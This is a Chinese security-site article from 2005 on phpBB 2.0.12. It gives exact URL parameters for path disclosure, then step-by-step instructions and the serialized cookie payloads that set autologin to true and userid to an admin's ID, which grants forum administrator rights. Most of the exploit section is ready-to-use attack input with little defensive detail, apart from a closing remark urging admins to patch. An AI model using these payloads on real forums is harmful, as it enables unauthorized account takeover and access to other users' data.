⊙ 在线帮助
⊙ 添加收藏
⊙ 网站地图
最新资讯
技术中心
下载园地
漏洞总汇
在线书籍
X-档案
法规标准
技术论坛
 您现在的位置 >> 首页 >> 技术中心 >> 黑客技术 >> 漏洞分析 >> 程序脚本
 
 
phpBB 2.0.12非法获取管理员权限及路径泄露漏洞的利用
【责 编】:AcOol
【作 者】:AcOol整理		 【时 间】:2005-3-8
【浏 览】:
【出 处】:酷客天堂
【字 体】:[   ]
    先说说路径泄露:

/viewtopic.php?t=1&highlight=\
或者
/viewtopic.php?t=1&highlight=\[cool]

    再说说获得管理员权限:

1. Register at forum?
2. Log in with account
  + UNCHECK "Log in automatically"
3. Close browser to be sure a cookie is made.
4. Locate cookie
    *firefox: X:\Documents and Settings\Name\Application
     Data\Mozilla\Firefox\Profiles\profile.default\cookies.txt
     --> search the .txt for the domainname (domain.tld)
     --> default cookiename = phpbbmysql
    *iexplorer: X:\Documents and Settings\Name\Cookies\Name@domain.tld
     --> default cookiename = phpbbmysql
Let's Xploit!
_______________

Open the cookie in a text editor and search a line that resembles:
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3B
       s%3A6%3A%22userid%22%3Bs%3A1%3A%22X%22%3B%7D

                                         |
                  [ your 'user id' ] ____|

Replace this with:
       a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3B
       s%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D

                                         |
          [ 2 = 'user id' of admin ] ____|

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
Save cookie and close.
Open your browser and surf to forum.
You'll now be automatically logged in having admin right :)

    看的懂的自己玩吧!
    补充一句:
    如果管理员的id不是2,那么就把
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
    改成
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22*%22%3B%7D
    其中*代表你要修改的id。管理员们现在赶紧去修补漏洞吧。
·本站特别声明不要转载或作者授权本站独家播发的文章,请勿转载。
·本站原创文章可自由转载,但本站作者及本站链接必须保留。
·非本站原创文章可自由转载,请按作者及文章出处一节,自行链接。
·转载之图片、文件,链接请不要盗链到本站,且不准打上各自站点的水印,亦不能抹去我站点水印。

+ 本站推荐 +
·ARP病毒问题的处理
·千兆以太网技术综述
·解析来自Autorun.inf文件的攻击
·破解Windows XP组策略的“锁死
·Linux Kernel 2.6.13 <= 2.6.1
+ 相关文章 +
·也谈跨站脚本攻击与防御
·Five common Web application
·Dvbbs7.1 sp1 SQL版savepost.a
·dvbbs7.1 sp1 savepost.asp注入
·“站内搜索写法一个SQL inject
+ 热点文章 +
·没有硝烟的战争:网络禁用与突
·“Worm.Win32.Viking.i”病毒分
·MSN登陆问题(MSN不能登陆的N种
·CnsMinKP.sys文件损坏导致系统
·Ethereal使用入门
+ 原创文章 +
·“Worm.Win32.Viking.i”病毒分
·信息安全产业三部曲之“敦刻尔
·Dvbbs7.1 sp1 SQL版savepost.a
·针对西京大学网站的一次安全性
·phpBB 2.0.12非法获取管理员权
 
 
关于站点 | 免责申明 | 版权隐私 | 业务合作 | 提供捐助 | 联系我们 Copyright © 2001-2005 CoolerSky. All Rights Reserved.